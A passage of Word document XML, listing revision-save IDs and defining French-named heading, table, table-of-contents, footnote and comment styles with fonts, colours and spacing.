    <w:rsid w:val="00D10F93"/>
    <w:rsid w:val="00D151E4"/>
    <w:rsid w:val="00D15D32"/>
    <w:rsid w:val="00D1773D"/>
    <w:rsid w:val="00D20244"/>
    <w:rsid w:val="00D20D85"/>
    <w:rsid w:val="00D21B8F"/>
    <w:rsid w:val="00D21D6C"/>
    <w:rsid w:val="00D23E3D"/>
    <w:rsid w:val="00D27283"/>
    <w:rsid w:val="00D32DF2"/>
    <w:rsid w:val="00D33E61"/>
    <w:rsid w:val="00D35748"/>
    <w:rsid w:val="00D375D8"/>
    <w:rsid w:val="00D37603"/>
    <w:rsid w:val="00D37C34"/>
    <w:rsid w:val="00D4008A"/>
    <w:rsid w:val="00D41422"/>
    <w:rsid w:val="00D41DF9"/>
    <w:rsid w:val="00D42337"/>
    <w:rsid w:val="00D439D7"/>
    <w:rsid w:val="00D45904"/>
    <w:rsid w:val="00D45950"/>
    <w:rsid w:val="00D45FEF"/>
    <w:rsid w:val="00D508BC"/>
    <w:rsid w:val="00D51ABB"/>
    <w:rsid w:val="00D522B3"/>
    <w:rsid w:val="00D53599"/>
    <w:rsid w:val="00D54F78"/>
    <w:rsid w:val="00D57912"/>
    <w:rsid w:val="00D57AD3"/>
    <w:rsid w:val="00D6048F"/>
    <w:rsid w:val="00D6236B"/>
    <w:rsid w:val="00D63012"/>
    <w:rsid w:val="00D63205"/>
    <w:rsid w:val="00D64062"/>
    <w:rsid w:val="00D64AFD"/>
    <w:rsid w:val="00D67112"/>
    <w:rsid w:val="00D70B97"/>
    <w:rsid w:val="00D72D62"/>
    <w:rsid w:val="00D74682"/>
    <w:rsid w:val="00D752C9"/>
    <w:rsid w:val="00D759E3"/>
    <w:rsid w:val="00D770B4"/>
    <w:rsid w:val="00D77679"/>
    <w:rsid w:val="00D779EB"/>
    <w:rsid w:val="00D800B3"/>
    <w:rsid w:val="00D80ABA"/>
    <w:rsid w:val="00D82221"/>
    <w:rsid w:val="00D82232"/>
    <w:rsid w:val="00D83352"/>
    <w:rsid w:val="00D84A4A"/>
    <w:rsid w:val="00D84B3F"/>
    <w:rsid w:val="00D926F7"/>
    <w:rsid w:val="00D93221"/>
    <w:rsid w:val="00D95C65"/>
    <w:rsid w:val="00D96019"/>
    <w:rsid w:val="00D9629C"/>
    <w:rsid w:val="00D96C2F"/>
    <w:rsid w:val="00D97CEA"/>
    <w:rsid w:val="00DA026F"/>
    <w:rsid w:val="00DA175F"/>
    <w:rsid w:val="00DA20D7"/>
    <w:rsid w:val="00DA22E9"/>
    <w:rsid w:val="00DA4A50"/>
    <w:rsid w:val="00DA5447"/>
    <w:rsid w:val="00DA65BC"/>
    <w:rsid w:val="00DA7105"/>
    <w:rsid w:val="00DA74C4"/>
    <w:rsid w:val="00DB21D4"/>
    <w:rsid w:val="00DB45B4"/>
    <w:rsid w:val="00DC17FE"/>
    <w:rsid w:val="00DC20AD"/>
    <w:rsid w:val="00DC3881"/>
    <w:rsid w:val="00DC592C"/>
    <w:rsid w:val="00DD1069"/>
    <w:rsid w:val="00DD2503"/>
    <w:rsid w:val="00DD3E8B"/>
    <w:rsid w:val="00DD3F00"/>
    <w:rsid w:val="00DD404A"/>
    <w:rsid w:val="00DD4050"/>
    <w:rsid w:val="00DD4E4D"/>
    <w:rsid w:val="00DD5725"/>
    <w:rsid w:val="00DD588C"/>
    <w:rsid w:val="00DD6838"/>
    <w:rsid w:val="00DD76B3"/>
    <w:rsid w:val="00DE138A"/>
    <w:rsid w:val="00DE34C3"/>
    <w:rsid w:val="00DE48C4"/>
    <w:rsid w:val="00DE6DF8"/>
    <w:rsid w:val="00DE7482"/>
    <w:rsid w:val="00DF2BDC"/>
    <w:rsid w:val="00DF3F2A"/>
    <w:rsid w:val="00DF431F"/>
    <w:rsid w:val="00DF47A3"/>
    <w:rsid w:val="00DF5853"/>
    <w:rsid w:val="00DF6D9F"/>
    <w:rsid w:val="00E002CA"/>
    <w:rsid w:val="00E00FFA"/>
    <w:rsid w:val="00E01335"/>
    <w:rsid w:val="00E020A2"/>
    <w:rsid w:val="00E0231E"/>
    <w:rsid w:val="00E02A34"/>
    <w:rsid w:val="00E02AF4"/>
    <w:rsid w:val="00E05DBA"/>
    <w:rsid w:val="00E06090"/>
    <w:rsid w:val="00E061FE"/>
    <w:rsid w:val="00E070EE"/>
    <w:rsid w:val="00E0761A"/>
    <w:rsid w:val="00E14D12"/>
    <w:rsid w:val="00E14E6F"/>
    <w:rsid w:val="00E162AD"/>
    <w:rsid w:val="00E166E8"/>
    <w:rsid w:val="00E173E7"/>
    <w:rsid w:val="00E17D76"/>
    <w:rsid w:val="00E24D88"/>
    <w:rsid w:val="00E25522"/>
    <w:rsid w:val="00E25CAA"/>
    <w:rsid w:val="00E25EF2"/>
    <w:rsid w:val="00E26423"/>
    <w:rsid w:val="00E30CEF"/>
    <w:rsid w:val="00E31148"/>
    <w:rsid w:val="00E31968"/>
    <w:rsid w:val="00E365C0"/>
    <w:rsid w:val="00E37607"/>
    <w:rsid w:val="00E37F4B"/>
    <w:rsid w:val="00E428C5"/>
    <w:rsid w:val="00E4477E"/>
    <w:rsid w:val="00E44B41"/>
    <w:rsid w:val="00E44F5A"/>
    <w:rsid w:val="00E458C5"/>
    <w:rsid w:val="00E46093"/>
    <w:rsid w:val="00E46F49"/>
    <w:rsid w:val="00E47BB6"/>
    <w:rsid w:val="00E512F9"/>
    <w:rsid w:val="00E52033"/>
    <w:rsid w:val="00E53F1A"/>
    <w:rsid w:val="00E541FE"/>
    <w:rsid w:val="00E54F31"/>
    <w:rsid w:val="00E55B1D"/>
    <w:rsid w:val="00E55DA6"/>
    <w:rsid w:val="00E602EE"/>
    <w:rsid w:val="00E615FA"/>
    <w:rsid w:val="00E632A5"/>
    <w:rsid w:val="00E6419A"/>
    <w:rsid w:val="00E66379"/>
    <w:rsid w:val="00E74A8D"/>
    <w:rsid w:val="00E772B8"/>
    <w:rsid w:val="00E83BB7"/>
    <w:rsid w:val="00E83F2A"/>
    <w:rsid w:val="00E85AFA"/>
    <w:rsid w:val="00E85EB9"/>
    <w:rsid w:val="00E868DE"/>
    <w:rsid w:val="00E87512"/>
    <w:rsid w:val="00E91BF8"/>
    <w:rsid w:val="00E91FBF"/>
    <w:rsid w:val="00E92DB8"/>
    <w:rsid w:val="00E95D04"/>
    <w:rsid w:val="00EA00B6"/>
    <w:rsid w:val="00EA0418"/>
    <w:rsid w:val="00EA1D6D"/>
    <w:rsid w:val="00EA3A6A"/>
    <w:rsid w:val="00EA3E4A"/>
    <w:rsid w:val="00EA5BD3"/>
    <w:rsid w:val="00EA6E4C"/>
    <w:rsid w:val="00EA7206"/>
    <w:rsid w:val="00EB0230"/>
    <w:rsid w:val="00EB0480"/>
    <w:rsid w:val="00EB0FD0"/>
    <w:rsid w:val="00EB16CE"/>
    <w:rsid w:val="00EB2F21"/>
    <w:rsid w:val="00EB3A14"/>
    <w:rsid w:val="00EB3A15"/>
    <w:rsid w:val="00EB54CD"/>
    <w:rsid w:val="00EB72B8"/>
    <w:rsid w:val="00EC14B2"/>
    <w:rsid w:val="00EC3B15"/>
    <w:rsid w:val="00EC5AD1"/>
    <w:rsid w:val="00EC7F7A"/>
    <w:rsid w:val="00ED0AD7"/>
    <w:rsid w:val="00ED0F55"/>
    <w:rsid w:val="00ED12F6"/>
    <w:rsid w:val="00ED16E7"/>
    <w:rsid w:val="00ED19C9"/>
    <w:rsid w:val="00ED1C2F"/>
    <w:rsid w:val="00ED2534"/>
    <w:rsid w:val="00ED4A40"/>
    <w:rsid w:val="00ED52D0"/>
    <w:rsid w:val="00ED604F"/>
    <w:rsid w:val="00ED6DA3"/>
    <w:rsid w:val="00ED7B9D"/>
    <w:rsid w:val="00EE2643"/>
    <w:rsid w:val="00EE49D4"/>
    <w:rsid w:val="00EE5EB5"/>
    <w:rsid w:val="00EE7961"/>
    <w:rsid w:val="00EF1F2D"/>
    <w:rsid w:val="00EF2086"/>
    <w:rsid w:val="00EF4D47"/>
    <w:rsid w:val="00EF7C37"/>
    <w:rsid w:val="00F00453"/>
    <w:rsid w:val="00F01EC4"/>
    <w:rsid w:val="00F04A15"/>
    <w:rsid w:val="00F06074"/>
    <w:rsid w:val="00F06D68"/>
    <w:rsid w:val="00F070E6"/>
    <w:rsid w:val="00F12F9B"/>
    <w:rsid w:val="00F143BA"/>
    <w:rsid w:val="00F14A47"/>
    <w:rsid w:val="00F176C9"/>
    <w:rsid w:val="00F2150F"/>
    <w:rsid w:val="00F2167E"/>
    <w:rsid w:val="00F22507"/>
    <w:rsid w:val="00F2306A"/>
    <w:rsid w:val="00F26294"/>
    <w:rsid w:val="00F27CC2"/>
    <w:rsid w:val="00F30900"/>
    <w:rsid w:val="00F3090E"/>
    <w:rsid w:val="00F36A4D"/>
    <w:rsid w:val="00F40CF9"/>
    <w:rsid w:val="00F424F2"/>
    <w:rsid w:val="00F43000"/>
    <w:rsid w:val="00F43154"/>
    <w:rsid w:val="00F452A6"/>
    <w:rsid w:val="00F4635D"/>
    <w:rsid w:val="00F51856"/>
    <w:rsid w:val="00F51A66"/>
    <w:rsid w:val="00F51DA1"/>
    <w:rsid w:val="00F52B35"/>
    <w:rsid w:val="00F539E9"/>
    <w:rsid w:val="00F54445"/>
    <w:rsid w:val="00F54C7D"/>
    <w:rsid w:val="00F55F53"/>
    <w:rsid w:val="00F56577"/>
    <w:rsid w:val="00F60841"/>
    <w:rsid w:val="00F60B89"/>
    <w:rsid w:val="00F60E76"/>
    <w:rsid w:val="00F61EDB"/>
    <w:rsid w:val="00F61EF0"/>
    <w:rsid w:val="00F6271F"/>
    <w:rsid w:val="00F62A2E"/>
    <w:rsid w:val="00F64F93"/>
    <w:rsid w:val="00F67266"/>
    <w:rsid w:val="00F67D67"/>
    <w:rsid w:val="00F70009"/>
    <w:rsid w:val="00F723E3"/>
    <w:rsid w:val="00F73F79"/>
    <w:rsid w:val="00F76512"/>
    <w:rsid w:val="00F7717D"/>
    <w:rsid w:val="00F778AE"/>
    <w:rsid w:val="00F81869"/>
    <w:rsid w:val="00F8198C"/>
    <w:rsid w:val="00F819D2"/>
    <w:rsid w:val="00F81E1B"/>
    <w:rsid w:val="00F81FEB"/>
    <w:rsid w:val="00F830E8"/>
    <w:rsid w:val="00F83B61"/>
    <w:rsid w:val="00F8552B"/>
    <w:rsid w:val="00F8563A"/>
    <w:rsid w:val="00F878D7"/>
    <w:rsid w:val="00F91120"/>
    <w:rsid w:val="00F91A84"/>
    <w:rsid w:val="00F93402"/>
    <w:rsid w:val="00F954C8"/>
    <w:rsid w:val="00F9566E"/>
    <w:rsid w:val="00F96983"/>
    <w:rsid w:val="00F97B3A"/>
    <w:rsid w:val="00FA146C"/>
    <w:rsid w:val="00FA1A63"/>
    <w:rsid w:val="00FA3844"/>
    <w:rsid w:val="00FA4836"/>
    <w:rsid w:val="00FB04DE"/>
    <w:rsid w:val="00FB2216"/>
    <w:rsid w:val="00FB2B3D"/>
    <w:rsid w:val="00FB33CE"/>
    <w:rsid w:val="00FB4E6D"/>
    <w:rsid w:val="00FB5718"/>
    <w:rsid w:val="00FB638D"/>
    <w:rsid w:val="00FB6A5F"/>
    <w:rsid w:val="00FC1DDD"/>
    <w:rsid w:val="00FC289D"/>
    <w:rsid w:val="00FC2AB2"/>
    <w:rsid w:val="00FC2F37"/>
    <w:rsid w:val="00FC4382"/>
    <w:rsid w:val="00FC52BC"/>
    <w:rsid w:val="00FC5A4A"/>
    <w:rsid w:val="00FC6A00"/>
    <w:rsid w:val="00FD1FA5"/>
    <w:rsid w:val="00FD1FDA"/>
    <w:rsid w:val="00FD2640"/>
    <w:rsid w:val="00FD2773"/>
    <w:rsid w:val="00FD5427"/>
    <w:rsid w:val="00FD5E35"/>
    <w:rsid w:val="00FD61E6"/>
    <w:rsid w:val="00FD6D0A"/>
    <w:rsid w:val="00FE01F9"/>
    <w:rsid w:val="00FE236A"/>
    <w:rsid w:val="00FE44B7"/>
    <w:rsid w:val="00FE7757"/>
    <w:rsid w:val="00FF10B6"/>
    <w:rsid w:val="00FF11B2"/>
    <w:rsid w:val="00FF5366"/>
    <w:rsid w:val="00FF6143"/>
    <w:rsid w:val="00FF7D5B"/>
    <w:rsid w:val="0A55BC77"/>
    <w:rsid w:val="65A37EF1"/>
    <w:rsid w:val="6873C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65A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361"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre1Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00F954C8"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="480" w:line="216" w:lineRule="auto"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="96"/>
      <w:szCs w:val="96"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00306E93"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre3Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00306E93"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="240" w:line="216" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="72"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre4Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00306E93"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:iCs/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Titre5Car"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003868C2"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="40" w:after="240" w:line="216" w:lineRule="auto"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="0059A1" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="9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954C8"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="96"/>
      <w:szCs w:val="96"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grilledutableau">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="003F69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306E93"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="minorHAnsi"/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="40"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:aliases w:val="Bullet List,FooterText,numbered,List Paragraph1,Paragraphe de liste1,Bulletr List Paragraph,列出段落,列出段落1,List Paragraph2,List Paragraph21,Listeafsnit1,Parágrafo da Lista1,Párrafo de lista1,リスト段落1,Bullet list,List Paragraph11"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ParagraphedelisteCar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F76512"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="h3">
    <w:name w:val="h3"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00483A02"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="En-tteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A4669C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A4669C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A4669C"/>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4669C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA76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re3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00306E93"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="72"/>
      <w:szCs w:val="56"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ParagraphedelisteCar">
    <w:name w:val="Paragraphe de liste Car"/>
    <w:aliases w:val="Bullet List Car,FooterText Car,numbered Car,List Paragraph1 Car,Paragraphe de liste1 Car,Bulletr List Paragraph Car,列出段落 Car,列出段落1 Car,List Paragraph2 Car,List Paragraph21 Car,Listeafsnit1 Car,Parágrafo da Lista1 Car,リスト段落1 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Paragraphedeliste"/>
    <w:uiPriority w:val="34"/>
    <w:locked/>
    <w:rsid w:val="00933E14"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="CellBody">
    <w:name w:val="Cell Body"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CellBodyChar"/>
    <w:qFormat/>
    <w:rsid w:val="00933E14"/>
    <w:pPr>
      <w:suppressAutoHyphens/>
      <w:spacing w:before="80" w:after="40" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cs="Arial"/>
      <w:color w:val="002050" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CellBodyChar">
    <w:name w:val="Cell Body Char"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="CellBody"/>
    <w:rsid w:val="00933E14"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Arial"/>
      <w:color w:val="002050" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="ColumnHeader">
    <w:name w:val="Column Header"/>
    <w:basedOn w:val="CellBody"/>
    <w:link w:val="ColumnHeaderChar"/>
    <w:qFormat/>
    <w:rsid w:val="00933E14"/>
    <w:rPr>
      <w:bCs/>
      <w:caps/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ColumnHeaderChar">
    <w:name w:val="Column Header Char"/>
    <w:basedOn w:val="CellBodyChar"/>
    <w:link w:val="ColumnHeader"/>
    <w:rsid w:val="00933E14"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Arial"/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="002050" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Notedebasdepage">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="NotedebasdepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00933E14"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NotedebasdepageCar">
    <w:name w:val="Note de bas de page Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Notedebasdepage"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00933E14"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Segoe UI"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Appelnotedebasdep">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00933E14"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="GridTable1Light-Accent11">
    <w:name w:val="Grid Table 1 Light - Accent 11"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00933E14"/>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auNormal"/>
    <w:uiPriority w:val="46"/>
    <w:rsid w:val="00933E14"/>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character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00933E14"/>
    <w:rPr>
      <w:color w:val="0078D7" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00306E93"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
      <w:iCs/>
      <w:color w:val="0078D7" w:themeColor="accent1"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grilleclaire">
    <w:name w:val="Light Grid"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="00A66863"/>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paragraph" w:styleId="TM1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA74C4"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Titre1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00306E93"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008012BB"/>
    <w:pPr>
      <w:spacing w:after="0"/>
      <w:ind w:left="400"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TM2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA74C4"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0"/>
      <w:ind w:left="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
      <w:iCs/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Marquedecommentaire">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00374868"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Commentaire">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentaireCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00374868"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentaireCar">
    <w:name w:val="Commentaire Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Commentaire"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00374868"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textedebulles">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextedebullesCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00374868"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TextedebullesCar">
    <w:name w:val="Texte de bulles Car"/>
